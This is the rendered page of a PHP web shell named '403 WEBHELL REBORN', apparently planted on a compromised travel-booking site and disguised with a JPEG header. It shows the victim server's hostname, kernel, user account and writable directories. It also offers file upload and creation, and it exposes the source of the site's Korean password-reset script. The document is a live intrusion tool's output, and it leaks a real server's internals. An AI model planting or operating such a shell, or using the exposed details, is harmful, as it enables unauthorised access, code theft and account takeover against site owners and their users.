ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/process/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/process/reset_password.php
<?php
	include $_SERVER['DOCUMENT_ROOT'].'/include/base.php';
	include $_SERVER['DOCUMENT_ROOT'].'/process/process_common.php';

	$tb_name = "TB_MEMBER";

	if(strpos($_SERVER['HTTP_REFERER'], "/page/login-reset.html") !== false){

		$get_ai_value = explode("?ai=",$_SERVER['HTTP_REFERER']);
		$get_ai_value = $get_ai_value[1];

		if($_POST['auth_key'] == $get_ai_value && $_POST['generate_ip'] == $_SERVER['REMOTE_ADDR']){

			$ip_address = $_SERVER['REMOTE_ADDR'];
			$member_id = trim($db_connect->escape_string($_POST['member_id']));
			$get_ai_value = trim($db_connect->escape_string($get_ai_value));


            $mb_password = trim($_POST['member_pw']);

			//비번 변경이 가능한지 확인
			$sql = "SELECT * FROM find_id_pw_auth_key WHERE mb_id = '{$member_id}' AND auth_key = '{$get_ai_value}' AND generate_ip = '{$ip_address}' AND is_used = 'N'";
			$res = $db_connect->query($sql);
			$data = $res->fetch_array(MYSQLI_ASSOC);

			if($data){
				//10분 이내인지 확인
				$generate_time = (int) $data['generate_time'];
				$now_time = time();

				if( ($now_time - $generate_time) >= (60 * 10)){

                    $msg = _e('인증시간이 지났습니다. ERR ACC 04');
					echo "<script>alert('{$msg}');location.href='/page/login.html';</script>";
					echo 'auth exit';
					exit;

				}else{

                    $mb_password = sha1($pw_salt_value.$mb_password);

                    $sql = "UPDATE {$tb_name} SET mb_pwd = '{$mb_password}' WHERE mb_id = '{$member_id}'";

                    if($db_connect->query($sql)){
                        $msg = _e('재설정 완료');
						echo "<script>alert('{$msg}');location.href='/page/login.html';</script>";
					}else{
                        $msg = _e('재설정 실패');
						echo "<script>alert('{$msg}');location.href='/page/login.html';</script>";
					}
				}

			}else{
                $msg = _e('인증정보가 없습니다.');
				echo "<script>alert('{$msg} ERR ACC 03');location.href='/page/login.html';</script>";
				echo 'auth exit';
				exit;

			}

		}else{
            $msg = _e('접근 정보가 올바르지 않습니다.');
			echo "<script>alert('{$msg} ERR ACC 02');location.href='/page/login.html';</script>";
			echo 'auth exit';
			exit;
		}
		exit;

	}else{
		//잘못된 접근
        $msg = _e('접근 정보가 올바르지 않습니다.');
		echo "<script>alert('{$msg} ERR ACC 01');location.href='/page/login.html';</script>";
		echo 'auth exit';
		exit;
	}
?>

Anon7 - 2021